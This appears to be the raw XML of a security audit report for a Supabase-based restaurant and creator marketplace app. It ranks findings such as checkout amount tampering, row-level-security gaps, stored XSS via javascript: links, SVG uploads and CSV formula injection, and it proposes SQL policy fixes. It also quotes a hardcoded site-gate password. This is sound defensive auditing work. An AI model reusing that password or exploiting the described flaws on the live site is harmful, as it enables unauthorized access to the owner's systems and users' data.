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Security Audit Report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Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The baseline is good — RLS is on across all 33 tables, Stripe webhooks are signature-verified, idempotency keys are in place, no secrets are bundled into the client, email verification and Donny OAuth (PKCE) are done correctly. The problem areas are 5 critical issues that need to be fixed before live Stripe keys turn on (amount tampering in sponsorship checkout, unescaped UGC in email templates, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">messages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RLS gap, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">discount_codes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> public-read situation, and unconfirmed Toast webhook verification), plus a list of high/medium items to clean up afterwards.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Severity ranking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4"/>
        <w:gridCol w:w="3790"/>
        <w:gridCol w:w="2321"/>
        <w:gridCol w:w="278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Issue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Where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Amount tampering in `create-sponsorship-checkout`</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — Stripe amount is accepted from client without DB validation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supabase/functions/create-sponsorship-checkout/index.ts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Email templates inject UGC without HTML escaping</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — campaign titles, user names, messages all → email HTML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supabase/functions/send-notification-email/index.ts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`messages` table has no RLS for conversation-scoped messages</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — relies on SECURITY DEFINER function; direct PostgREST query bypasses the check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p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">migration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20250617113401</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + later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`discount_codes` blocks public read</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> —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/promo/*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> QR redemption flow is broken </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">or</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> falls back to a service-role bypass that needs auditing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if used as RLS-protected; HIGH otherwise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">migration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20251209163242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Toast redemption webhook signature verification status unconfirmed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if missing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supabase/functions/toast-redemption-webhook/index.ts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Social media URLs rendered as `href` without `javascript:` validation</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — stored XSS via creator profile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creator-browse/CreatorProfileModal.tsx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campaigns/RestaurantProfileCard.tsx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React Query cache not cleared on logout</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — cross-user data leakage if two users share a browser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src/contexts/AuthContext.tsx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src/hooks/useLogout.ts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`profile-assets` storage bucket is public</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — should be private with signed URLs (matches the existing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campaign-deliverables</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> fix)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p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">migration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20250615233039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MIME-type validation on uploads is client-side only</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — easily spoofed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src/lib/storage/uploadProfileAsset.ts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`profile_views.INSERT` allows anonymous writes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">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WITH CHECK (true)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) — DoS / fake-traffic vector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  <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">migration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20250617111927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`analytics_events.INSERT` allows anonymous writes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  <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">migration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20250617160641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`user_presence.SELECT` lets any authenticated user read all presence</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — user enumeration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  <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">migration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20250617113401</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">13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`campaign_sponsorships.UPDATE` allows three roles to modify the same row</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — no role-aware narrowing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  <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">migration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20251001203644</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">14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`email_verification_tokens` has no INSERT/UPDATE/DELETE policies</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (relies on RLS-default deny + service-role); fragile to future changes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  <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">migration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20251014150439</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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SiteGate password hardcoded in client bundle</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">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'dragoncandy2026'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) — visible to anyone with DevTools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src/pages/SiteGate.tsx:4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">16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`dc_site_unlocked_until` not cleared on logout</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — next user inherits the unlocked state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src/lib/authCleanup.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">17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`chat-assistant` and Donny LLM endpoints have no per-user rate limiting</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — cost-burn vector via Anthropic / OpenAI tokens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supabase/functions/chat-assistant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donny-chat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">18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CORS `Access-Control-Allow-Origin: *` on every edge function</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — defense-in-depth gap; should be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https://dragoncandy.io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all 56 edge functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">19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SVG allowed in profile image MIME types</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — embedded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&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> vector if served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image/svg+xml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src/lib/fileUtils.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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CSV export of admin DragonShare ledger doesn't escape leading `=`/`+`/`-`/`@`</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — Excel formula injection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src/pages/AdminDragonShareLedger.tsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">21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 CSP meta tag in `index.html`</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — Lovable.dev limits HTTP headers, but a meta CSP is still valuable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index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">22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Toast OAuth token encryption-at-rest not confirmed</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (no pgsodium column constraint visible)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migration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toast_connections</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">23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Donny markdown links don't validate `href` for `javascript:`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src/components/donny/DonnyMessage.tsx:70</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inactivity timeout is purely client-side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src/hooks/useInactivityTimeout.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">25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vite.config.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> dev server binds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0.0.0.0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dev only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">26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supabase/.temp/linked-project.json</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> not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.gitignore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.gitignore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Row Level Security (RLS) Audit — 33 tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RLS is enabled on every audited table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (verified across </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase/migrations/*.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 111 migrations). The issues below are about </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">policy correctness</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not whether RLS is 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Status legend: ✅ OK · ⚠️ HIGH · 🔴 CRITICAL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 Critical &amp; high</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🔴 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">messages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — no RLS for conversation-scoped rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The original policies on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">messages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (added in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">20250616011059</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) check </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">sender_id = auth.uid() OR recipient_id = auth.uid()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. When the conversation system was added in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">20250617113401</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">conversation_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> column was introduced for group / campaign threads, but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">no SELECT policy was added for conversation-scoped messages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Access control instead lives in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">get_user_conversations()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function (SECURITY DEFINER).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this is critical:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgREST exposes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">messages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directly to the JS client. A query like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supabase.from('messages').select('*').eq('conversation_id', '&lt;id&gt;')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is checked against the table's RLS policies, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the SECURITY DEFINER function. For messages where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">sender_id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recipient_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are both NULL (group threads), the original policy fails closed — but if either column happens to be filled in for the current user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">for any reason</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the query returns rows.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add an explicit SELECT policy that covers conversation participation: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POLICY "messages: conversation participants"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ON public.messages FOR SELECT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USING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sender_id = auth.uid()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OR recipient_id = auth.uid()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OR EXISTS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SELECT 1 FROM conversation_participants cp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WHERE cp.conversation_id = messages.conversation_id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AND cp.user_id = auth.uid()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AND cp.left_at IS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🔴 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">discount_codes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — public read missing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policies (from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">20251209163242</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) restrict ALL operations to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">EXISTS (SELECT 1 FROM promotions WHERE id = discount_codes.promotion_id AND user_id = auth.uid())</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">/promo/:promotionId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> route is public (the only path that bypasses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">SiteGateGuard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and needs to look up codes by hash for QR redemption. Either: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The lookup happens via a service-role edge function (in which case RLS is moot — confirm this and document), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">or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The lookup happens via direct PostgREST and is currently </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">broken</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for unauthenticated users.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 (if direct):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> add a narrow SELECT policy keyed off a hashed code, not the full row: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POLICY "discount_codes: public hash lookup"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ON public.discount_codes FOR SELECT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USING (true);   -- and only expose the columns needed via a view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Better: route all QR redemption through a service-role edge function and keep the table fully restricted. Audit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">redeem-discount-code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (or wherever the redemption path lives) to confirm.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⚠️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">campaign_sponsorships</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — UPDATE allows three roles, no narrowing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UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> policy (migration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">20251001203644</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) uses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brand_id IN (...) OR restaurant_id IN (...) OR campaign_id IN (...)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 a brand can write to fields that should only be writable by the restaurant (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">acceptance_status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and vice versa. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fix:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> split into per-role policies, each restricting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH CHECK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to columns that role is allowed to mutate. At a minimum, gate write access to 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payment_status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and amount columns to service-role only.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⚠️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">email_verification_tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — missing INSERT/UPDATE/DELETE policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Only a SELECT policy exists (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.uid() = user_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, migration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">20251014150439</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). RLS defaults to deny for unspecified actions, so writes from non-service-role principals are blocked — but the absence of explicit deny-all-but-service-role is a footgun for future migrations. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fix:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> add explicit policies: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POLICY "email_verif: deny client writes"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ON public.email_verification_tokens FOR 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TO authenticated USING (false) WITH CHECK (false);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⚠️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">profile_views.INSERT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — anonymous writes allowed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INSERT WITH CHECK (true)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">TO authenticated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Lets unauthenticated users flood the table with fake </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">viewer_id = NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rows. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fix:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> restrict to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">TO authenticated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and add a uniqueness or rate-limit constraint (one row per </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">(viewer_id, profile_id)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per hour, enforced via a unique partial index).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⚠️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">analytics_events.INSERT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — anonymous writes allowed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The latest policy in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">20250617160641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POLICY "Analytics events are insertable by anyone"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ON public.analytics_events FOR INSERT WITH CHECK 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Same DoS vector. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fix:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scope to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">TO authenticated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If you need anonymous client-side telemetry, accept it through a dedicated edge function with rate limiting and bot detection.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⚠️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">user_presence.SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — site-wide visibility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USING (true) TO authenticated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lets any logged-in user see who else is online. User enumeration vector — competitors can scrape usage patterns; a stalking creator could watch a specific business's online status. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fix:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> restrict to conversation participants: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USING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user_id = auth.uid()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OR EXISTS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SELECT 1 FROM conversation_participants cp1, conversation_participants cp2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WHERE cp1.user_id = auth.uid()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AND cp2.user_id = user_presence.user_id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AND cp1.conversation_id = cp2.conversation_id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AND cp1.left_at IS NULL AND cp2.left_at IS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OK (with notes)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80"/>
        <w:gridCol w:w="867"/>
        <w:gridCol w:w="511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profiles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auth.uid() = id</w:t>
            </w:r>
            <w:r>
